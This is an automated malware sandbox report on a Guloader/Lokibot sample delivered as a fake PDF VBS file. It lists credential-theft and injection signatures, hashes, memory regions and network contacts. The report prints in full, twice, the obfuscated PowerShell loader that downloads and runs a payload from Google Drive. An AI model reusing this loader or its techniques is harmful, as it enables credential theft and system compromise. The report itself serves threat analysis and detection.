memory/4664-35-0x0000000005A70000-0x0000000005DC4000-memory.dmp
memory/4664-36-0x00000000060B0000-0x00000000060CE000-memory.dmp
memory/4664-37-0x00000000060F0000-0x000000000613C000-memory.dmp
memory/4664-39-0x0000000006640000-0x000000000665A000-memory.dmp
memory/4664-38-0x0000000007A50000-0x00000000080CA000-memory.dmp
memory/4664-41-0x00000000072D0000-0x00000000072F2000-memory.dmp
memory/4664-40-0x00000000073D0000-0x0000000007466000-memory.dmp
memory/4664-42-0x00000000080D0000-0x0000000008674000-memory.dmp
C:\Users\Admin\AppData\Roaming\Carbines.Que
| MD5 | fed7d2b1a62075a148249e5d86063b30 |
| SHA1 | f2e3c9605313437d6dc1668982f8d8c21d42d75d |
| SHA256 | c31da00f237eeb4bc98b2d1396d5bdb56c51c18d4ede431dcd6049e4a78f18ba |
| SHA512 | 66f6fa6b5af2c09bee449cc9560194fa82a23affc4c90e2e3698458fab319a50163f5b581e8ff734dd7de6d0a12151d10c0b6011f3346f6568becc6707675450 |
memory/4664-44-0x0000000008680000-0x000000000C1EE000-memory.dmp
memory/3976-61-0x00007FFCF89A0000-0x00007FFCF9461000-memory.dmp
memory/4068-58-0x00000000012C0000-0x0000000004E2E000-memory.dmp
memory/4068-72-0x00000000012C0000-0x0000000004E2E000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-09 19:32
Reported
2024-09-09 19:35
Platform
win7-20240704-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2216 set thread context of 2780 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 216.58.201.110:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 216.58.201.110:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.179.227:80 | o.pki.goog | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 137.184.191.215:80 | 137.184.191.215 | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 92.123.143.234:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab780F.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2616-20-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp
memory/2616-23-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-22-0x0000000002820000-0x0000000002828000-memory.dmp
memory/2616-21-0x000000001B600000-0x000000001B8E2000-memory.dmp
memory/2616-25-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-24-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-26-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-27-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-28-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp
memory/2616-30-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-31-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OEV9XBIIGR3TUWYFZ422.temp
| MD5 | 2488869d637c1979b85bc2adf1a09838 |
| SHA1 | 5873bd01769014537e1f431166a56c9343d16482 |
| SHA256 | 3ca1bafa69f871eeb5bd84f75c9cebeb2b36dd1a6f4b3294c2ae6239b89d7f2c |
| SHA512 | f0c13acf7a93b6760b3033cbad522e66b44f4ba05d1bbffa6bb3113b4397612661d585297e364679f516ca178f911152bd727b34d62f30d3f96e8fbb920bc13a |
C:\Users\Admin\AppData\Roaming\Carbines.Que
| MD5 | fed7d2b1a62075a148249e5d86063b30 |
| SHA1 | f2e3c9605313437d6dc1668982f8d8c21d42d75d |
| SHA256 | c31da00f237eeb4bc98b2d1396d5bdb56c51c18d4ede431dcd6049e4a78f18ba |
| SHA512 | 66f6fa6b5af2c09bee449cc9560194fa82a23affc4c90e2e3698458fab319a50163f5b581e8ff734dd7de6d0a12151d10c0b6011f3346f6568becc6707675450 |
memory/2216-36-0x00000000066B0000-0x000000000A21E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c790bcec6427196cca8456a5b1a49079 |
| SHA1 | 3017bf045ad2a9e9aae55ad3068a61ca02560fe5 |
| SHA256 | a98e8d1290535bda036224cadfe388d7dc62a49e3f0e08f7dd0f524f886ad413 |
